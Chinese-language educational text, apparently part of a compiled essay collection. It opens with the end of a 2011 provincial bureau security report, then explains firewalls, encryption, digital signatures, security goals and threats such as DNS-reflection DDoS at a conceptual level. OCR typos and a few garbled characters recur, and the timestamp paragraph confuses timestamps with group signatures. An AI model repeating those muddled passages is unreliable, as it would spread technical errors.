1、防護(hù)設(shè)備的智能化可成倍提高工作效率。當(dāng)前各單位普遍存在網(wǎng)絡(luò)與信息化安全工作經(jīng)費(fèi)投入少、人員緊張的問題。為此，建議在各單位增設(shè)智能化防護(hù)設(shè)備、安全監(jiān)控設(shè)備，通過設(shè)備智能分析、智能定位風(fēng)險(xiǎn)點(diǎn)，大大減輕手工勞動(dòng)與人力投入。

2、增強(qiáng)工作人員的責(zé)任心是做好網(wǎng)絡(luò)與信息安全的最可靠保障。網(wǎng)絡(luò)與信息安全責(zé)任重大，容不得絲毫疏忽和大意。只有在工作中加強(qiáng)工作人員的責(zé)任感，才能做到防范于未然。

為此，我局將進(jìn)一步建立健全網(wǎng)絡(luò)與信息安全管理制度，強(qiáng)化人員崗位培訓(xùn)，完善技術(shù)措施，不斷提高網(wǎng)絡(luò)與信息安全防護(hù)能力。

省局辦公室

二○一一年十月三十日

第五篇：網(wǎng)絡(luò)信息安全

網(wǎng)絡(luò)信息安全

信息安全是指為建立信息處理系統(tǒng)而采取的技術(shù)上和管理上的安全保護(hù)，以實(shí)現(xiàn)電子信息的保密性、完整性、可用性和可控性。當(dāng)今信息時(shí)代，計(jì)算機(jī)網(wǎng)絡(luò)已經(jīng)成為一種不可缺少的信息交換工具。然而，由于計(jì)算機(jī)網(wǎng)絡(luò)具有開放性、互聯(lián)性、連接方式的多樣性及終端分布的不均勻性，再加上本身存在的技術(shù)弱點(diǎn)和人為的疏忽，致使網(wǎng)絡(luò)易受計(jì)算機(jī)病毒、黑客或惡意軟件的侵害。面對(duì)侵襲網(wǎng)絡(luò)安全的種種威脅，必須考慮信息的安全這個(gè)至關(guān)重要的問題。

網(wǎng)絡(luò)信息安全分為網(wǎng)絡(luò)安全和信息安全兩個(gè)層面。網(wǎng)絡(luò)安全包括系統(tǒng)安全，即硬件平臺(tái)、操作系統(tǒng)、應(yīng)用軟件;運(yùn)行服務(wù)安全，即保證服務(wù)的連續(xù)性、高效率。信息安全則主要是指數(shù)據(jù)安全，包括數(shù)據(jù)加密、備份、程序等。

1．硬件安全。即網(wǎng)絡(luò)硬件和存儲(chǔ)媒體的安全。要保護(hù)這些硬設(shè)施不受損害，能夠正常工作。

2.軟件安全。即計(jì)算機(jī)及其網(wǎng)絡(luò)中各種軟件不被篡改或破壞，不被非法操作或誤操作，功能不會(huì)失效，不被非法復(fù)制。

3.運(yùn)行服務(wù)安全。即網(wǎng)絡(luò)中的各個(gè)信息系統(tǒng)能夠正常運(yùn)行并能正常地通過網(wǎng)絡(luò)交流信息。通過對(duì)網(wǎng)絡(luò)系統(tǒng)中的各種設(shè)備運(yùn)行狀況的監(jiān)測(cè)，發(fā)現(xiàn)不安全因素能及時(shí)報(bào)警并采取措施改變不安全狀態(tài)，保障網(wǎng)絡(luò)系統(tǒng)正常運(yùn)行。

4.數(shù)據(jù)安全。即網(wǎng)絡(luò)中存儲(chǔ)及流通數(shù)據(jù)的女全。要保護(hù)網(wǎng)絡(luò)中的數(shù)據(jù)不被篡改、非法增刪、復(fù)制、解密、顯示、使用等。它是保障網(wǎng)絡(luò)安全最根本的目的。

1.防火墻技術(shù)。防火墻（Firewall）是近年來發(fā)展的最重要的安全技術(shù)，它的主要功能是加強(qiáng)網(wǎng)絡(luò)之間的訪問控制，防止外部網(wǎng)絡(luò)用戶以非法手段通過外部網(wǎng)絡(luò)進(jìn)入內(nèi)部網(wǎng)絡(luò)（被保護(hù)網(wǎng)絡(luò)）。它對(duì)兩個(gè)或多個(gè)網(wǎng)絡(luò)之間傳輸?shù)臄?shù)據(jù)包和鏈接方式按照一定的安全策略對(duì)其進(jìn)行檢查，來決定網(wǎng)絡(luò)之間的通信是否被允許，并監(jiān)視網(wǎng)絡(luò)運(yùn)行狀態(tài)。簡(jiǎn)單防火墻技術(shù)可以在路由器上實(shí)現(xiàn)，而專用防火墻提供更加可靠的網(wǎng)絡(luò)安全控制方法。

防火墻的安全策略有兩條。一是“凡是未被準(zhǔn)許的就是禁止的”。防火墻先是封閉所有信息流，然后審查要求通過的信息，符合條件的就讓通過；二是“凡是未被禁止的就是允許的”，防火墻先是轉(zhuǎn)發(fā)所有的信息，然后再逐項(xiàng)剔除有害的內(nèi)容，被禁止的內(nèi)容越多，防火墻的作用就越大。網(wǎng)絡(luò)是動(dòng)態(tài)發(fā)展的，安全策略的制定不應(yīng)建立在靜態(tài)的基礎(chǔ)之上。在制定防火墻安全規(guī)則時(shí)，應(yīng)符合“可適應(yīng)性的安全管理”模型的原則，即：安全=風(fēng)險(xiǎn)分析+執(zhí)行策略+系統(tǒng)實(shí)施+漏洞監(jiān)測(cè)+實(shí)時(shí)響應(yīng)。防火墻技術(shù)主要有以下三類：

●包過濾技術(shù)（Packct Filtering）。它一般用在網(wǎng)絡(luò)層，主要根據(jù)防火墻系統(tǒng)所收到的每個(gè)數(shù)據(jù)包的源IP地址、目的IP地址、TCP/UDP源端口號(hào)、TCP/UDP目的端口號(hào)及數(shù)據(jù)包中的各種標(biāo)志位來進(jìn)行判定，根據(jù)系統(tǒng)設(shè)定的安全策略來決定是否讓數(shù)據(jù)包通過，其核心就是安全策略，即過濾算法的設(shè)計(jì)。

●代理（Proxy）服務(wù)技術(shù)。它用來提供應(yīng)用層服務(wù)的控制，起到外部網(wǎng)絡(luò)向內(nèi)部網(wǎng)絡(luò)申請(qǐng)服務(wù)時(shí)的中間轉(zhuǎn)接作用。內(nèi)部網(wǎng)絡(luò)只接受代理提出的服務(wù)請(qǐng)求，拒絕外部網(wǎng)絡(luò)其它節(jié)點(diǎn)的直接請(qǐng)求。運(yùn)行代理服務(wù)的主機(jī)被稱為應(yīng)用機(jī)關(guān)。代理服務(wù)還可以用于實(shí)施較強(qiáng)的數(shù)據(jù)流監(jiān)控、過濾、記錄等功能。

●狀態(tài)監(jiān)控（Statc Innspection）技術(shù)。它是一種新的防火墻技術(shù)。在網(wǎng)絡(luò)層完成所有必要的防火墻功能——包過濾與網(wǎng)絡(luò)服務(wù)代理。目前最有效的實(shí)現(xiàn)方法是采用 Check Point）提出的虛擬機(jī)方式（Inspect Virtual Machine）。

防火墻技術(shù)的優(yōu)點(diǎn)很多，一是通過過濾不安全的服務(wù)，極大地提高網(wǎng)絡(luò)安全和減少子網(wǎng)中主機(jī)的風(fēng)險(xiǎn)；二是可以提供對(duì)系統(tǒng)的訪問控制；三是可以阻擊攻擊者獲取攻擊網(wǎng)絡(luò)系統(tǒng)的有用信息；四是防火墻還可以記錄與統(tǒng)計(jì)通過它的網(wǎng)絡(luò)通信，提供關(guān)于網(wǎng)絡(luò)使用的統(tǒng)計(jì)數(shù)據(jù)，根據(jù)統(tǒng)計(jì)數(shù)據(jù)來判斷可能的攻擊和探測(cè)；五是防火墻提供制定與執(zhí)行網(wǎng)絡(luò)安全策略的手段，它可以對(duì)企業(yè)內(nèi)部網(wǎng)實(shí)現(xiàn)集中的安全管理。

防火墻技術(shù)的不足有三。一是防火墻不能防止繞過防火墻的攻擊；二是防火墻經(jīng)不起人為因素的攻擊。由于防火墻對(duì)網(wǎng)絡(luò)安全實(shí)施單點(diǎn)控制，因此可能受到黑客的攻擊；三是防火墻不能保證數(shù)據(jù)的秘密性，不能對(duì)數(shù)據(jù)進(jìn)行鑒別，也不能保證網(wǎng)絡(luò)不受病毒的攻擊。

2.加密技術(shù)。數(shù)據(jù)加密被認(rèn)為是最可靠的安全保障形式，它可以從根本上滿足信息完整性的要求，是一種主動(dòng)安全防范策略。數(shù)據(jù)加密就是按照確定的密碼算法將敏感的明文數(shù)據(jù)變換成難以識(shí)別的密文數(shù)據(jù)。通過使用不同的密鑰，可用同一加密算法，將同一明文加密成不同的密文。當(dāng)需要時(shí)可使用密鑰將密文數(shù)據(jù)還原成明文數(shù)據(jù)，稱為解密。

密鑰加密技術(shù)分為對(duì)稱密鑰加密和非對(duì)稱密鑰加密兩類。對(duì)稱加密技術(shù)是在加密與解密過程中使用相同的密鑰加以控制，它的保密度主要取決于對(duì)密鑰的保密。它的特點(diǎn)是數(shù)字運(yùn)算量小，加密速度快，弱點(diǎn)是密鑰管理困難，一旦密鑰泄露，將直接影響到信息的安全。非對(duì)稱密鑰加密法是在加密和解密過程中使用不同的密鑰加以控制，加密密鑰是公開的，解密密鑰是保密的。它的保密度依賴于從公開的加密密鑰或密文與明文的對(duì)照推算解密密鑰在計(jì)算上的不可能性。算法的核心是運(yùn)用一種特殊的數(shù)學(xué)函數(shù)——單向陷門函數(shù)，即從一個(gè)方向求值是容易的，但其逆向計(jì)算卻很困難，從而在實(shí)際上成為不可能。

除了密鑰加密技術(shù)外，還有數(shù)據(jù)加密技術(shù)。一是鏈路加密技術(shù)。鏈路加密是對(duì)通信線路加密；二是節(jié)點(diǎn)加密技術(shù)。節(jié)點(diǎn)加密是指對(duì)存儲(chǔ)在節(jié)點(diǎn)內(nèi)的文件和數(shù)據(jù)庫(kù)信息進(jìn)行的加密保護(hù)。

3.數(shù)字簽名技術(shù)。數(shù)字簽名（Digital Signature）技術(shù)是將摘要用發(fā)送者的私鑰加密，與原文一起傳送給接收者。接收者只有用發(fā)送者的公鑰才能解密被加密的摘要。在電子商務(wù)安全保密系統(tǒng)中，數(shù)字簽名技術(shù)有著特別重要的地位，在電子商務(wù)安全服務(wù)中的源鑒別、完整性服務(wù)、不可否認(rèn)服務(wù)中都要用到數(shù)字簽名技術(shù)。

在書面文件上簽名是確認(rèn)文件的一種手段，其作用有兩點(diǎn)，一是因?yàn)樽约旱暮灻y以否認(rèn)，從而確認(rèn)文件已簽署這一事實(shí)；二是因?yàn)楹灻灰追旅?，從而確定了文件是真的這一事實(shí)。數(shù)字簽名與書面簽名有相同相通之處，也能確認(rèn)兩點(diǎn)，一是信息是由簽名者發(fā)送的，二是信息自簽發(fā)后到收到為止未曾做過任何修改。這樣，數(shù)字簽名就可用來防止：電子信息因易于修改而有人作偽；冒用別人名義發(fā)送信息；發(fā)出（收到）信件后又加以否認(rèn)。

廣泛應(yīng)用的數(shù)字簽名方法有RSA簽名、DSS簽名和 Hash簽名三種。RSA的最大方便是沒有密鑰分配問題。公開密鑰加密使用兩個(gè)不同的密鑰，其中一個(gè)是公開的，另一個(gè)是保密的。公開密鑰可以保存在系統(tǒng)目錄內(nèi)、未加密的電子郵件信息中、電話黃頁(yè)上或公告牌里，網(wǎng)上的任何用戶都可獲得公開密鑰。保密密鑰是用戶專用的，由用戶本身持有，它可以對(duì)公開密鑰加密的信息解密。DSS數(shù)字簽名是由美國(guó)政府頒布實(shí)施的，主要用于跟美國(guó)做生意的公司。它只是一個(gè)簽名系統(tǒng)，而且美國(guó)不提倡使用任何削弱政府竊聽能力的加密軟件。Hash簽名是最主要的數(shù)字簽名方法，跟單獨(dú)簽名的RSA數(shù)字簽名不同，它是將數(shù)字簽名和要發(fā)送的信息捆在一起，所以更適合電子商務(wù)。

4.數(shù)字時(shí)間戳技術(shù)。在電子商務(wù)交易的文件中，時(shí)間是十分重要的信息，是證明文件有效性的主要內(nèi)容。在簽名時(shí)加上一個(gè)時(shí)間標(biāo)記，即有數(shù)字時(shí)間戳（Digita Timestamp）的數(shù)字簽名方案：驗(yàn)證簽名的人或以確認(rèn)簽名是來自該小組，卻不知道是小組中的哪一個(gè)人簽署的。指定批準(zhǔn)人簽名的真實(shí)性，其他任何人除了得到該指定人或簽名者本人的幫助，否則不能驗(yàn)證簽名

（二）網(wǎng)絡(luò)信忽安全的目標(biāo)

1.保密性。保密性是指信息不泄露給非授權(quán)人、實(shí)休和過程，或供其使用的特性。

2.完整性。完整性是指信息未經(jīng)授權(quán)不能被修改、不被破壞、不被插人、不遲延、不亂序和不丟失的特性。對(duì)網(wǎng)絡(luò)信息安全進(jìn)行攻擊的最終目的就是破壞信息的完整性。

3.可用性。可用性是指合法用戶訪問并能按要求順序使用信息的特性，即保證合法用戶在需要時(shí)可以訪問到信息

4.可控性?？煽匦允侵甘跈?quán)機(jī)構(gòu)對(duì)信息的內(nèi)容及傳播具有控制的能力的特性，可以控制授權(quán)范圍內(nèi)的信息流向以及方式。

5.可審查性。在信息交流過程結(jié)束后，通信雙方不能抵賴曾經(jīng)做出的行為，也不能否認(rèn)曾經(jīng)接收到對(duì)方的信息。

網(wǎng)絡(luò)信息安全面臨的問題

1.網(wǎng)絡(luò)協(xié)議和軟件的安全缺陷

因特網(wǎng)的基石是TCP/IP協(xié)議簇，該協(xié)議簇在實(shí)現(xiàn)上力求效率，而沒有考慮安全因素，因?yàn)槟菢訜o疑增大代碼量，從而降低了TCP/IP的運(yùn)行效率，所以說TCP/IP本身在設(shè)計(jì)上就是不安全的。很容易被竊聽和欺騙：大多數(shù)因特網(wǎng)上的流量是沒有加密的，電子郵件口令、文件傳輸很容易被監(jiān)聽和劫持。很多基于TCP/IP的應(yīng)用服務(wù)都在不同程度上存在著安全問題，這很容易被一些對(duì)TCP/IP十分了解的人所利用，一些新的處于測(cè)試階級(jí)的服務(wù)有更多的安全缺陷。缺乏安全策略：許多站點(diǎn)在防火墻配置上無意識(shí)地?cái)U(kuò)大了訪問權(quán)限，忽視了這些權(quán)限可能會(huì)被內(nèi)部人員濫用，黑客從一些服務(wù)中可以獲得有用的信息，而網(wǎng)絡(luò)維護(hù)人員卻不知道應(yīng)該禁止這種服務(wù)。配置的復(fù)雜性：訪問控制的配置一般十分復(fù)雜，所以很容易被錯(cuò)誤配置，從而給黑客以可乘之機(jī)。TCP/IP是被公布于世的，了解它的人越多被人破壞的可能性越大。現(xiàn)在，銀行之間在專用網(wǎng)上傳輸數(shù)據(jù)所用的協(xié)議都是保密的，這樣就可以有效地防止入侵。當(dāng)然，人們不能把TCP/IP和其實(shí)現(xiàn)代碼保密，這樣不利于TCP/IP網(wǎng)絡(luò)的發(fā)展。2.黑客攻擊手段多樣

進(jìn)人2006年以來，網(wǎng)絡(luò)罪犯采用翻新分散式阻斷服務(wù)(DDOS)攻擊的手法，用形同互聯(lián)網(wǎng)黃頁(yè)的域名系統(tǒng)服務(wù)器來發(fā)動(dòng)攻擊，擾亂在線商務(wù)。寬帶網(wǎng)絡(luò)條件下，常見的拒絕服務(wù)攻擊方式主要有兩種，一是網(wǎng)絡(luò)黑客蓄意發(fā)動(dòng)的針對(duì)服務(wù)和網(wǎng)絡(luò)設(shè)備的DDOS攻擊;二是用蠕蟲病毒等新的攻擊方式，造成網(wǎng)絡(luò)流量急速提高，導(dǎo)致網(wǎng)絡(luò)設(shè)備崩潰，或者造成網(wǎng)絡(luò)鏈路的不堪負(fù)重。

調(diào)查資料顯示，2006年初發(fā)現(xiàn)企業(yè)的系統(tǒng)承受的攻擊規(guī)模甚于以往，而且來源不是被綁架的“僵尸”電腦，而是出自于域名系統(tǒng)(DNS)服務(wù)器。一旦成為DDOS攻擊的目標(biāo)，目標(biāo)系統(tǒng)不論是網(wǎng)頁(yè)服務(wù)器、域名服務(wù)器，還是電子郵件服務(wù)器，都會(huì)被網(wǎng)絡(luò)上四面八方的系統(tǒng)傳來的巨量信息給淹沒。黑客的用意是借人量垃圾信息妨礙系統(tǒng)正常的信息處理，借以切斷攻擊目標(biāo)對(duì)外的連線。黑客常用“僵尸”電腦連成網(wǎng)絡(luò)，把大量的查詢要求傳至開放的DNS服務(wù)器，這些查詢信息會(huì)假裝成被巨量信息攻擊的目標(biāo)所傳出的，因此DNS服務(wù)器會(huì)把回應(yīng)信息傳到那個(gè)網(wǎng)址。

美國(guó)司法部的一項(xiàng)調(diào)查資料顯示，1998年3月到2005年2月期間，82%的人侵者掌握授權(quán)用戶或設(shè)備的數(shù)據(jù)。在傳統(tǒng)的用戶身份認(rèn)證環(huán)境下，外來攻擊者僅憑盜取的相關(guān)用戶身份憑證就能以任何臺(tái)設(shè)備進(jìn)人網(wǎng)絡(luò)，即使最嚴(yán)密的用戶認(rèn)證保護(hù)系統(tǒng)也很難保護(hù)網(wǎng)絡(luò)安全。另外，由于企業(yè)員工可以通過任何一臺(tái)未經(jīng)確認(rèn)和處理的設(shè)備，以有效合法的個(gè)人身份憑證進(jìn)入網(wǎng)絡(luò)，使間諜軟件、廣告軟件、木馬程序及其它惡意程序有機(jī)可乘，嚴(yán)重威脅網(wǎng)絡(luò)系統(tǒng)的安全。

有資料顯示，最近拉美國(guó)家的網(wǎng)絡(luò)詐騙活動(dòng)增多，作案手段先進(jìn)。犯罪活動(dòng)已經(jīng)從“現(xiàn)實(shí)生活轉(zhuǎn)入虛擬世界”，網(wǎng)上詐騙活動(dòng)日益增多。3.計(jì)算機(jī)病毒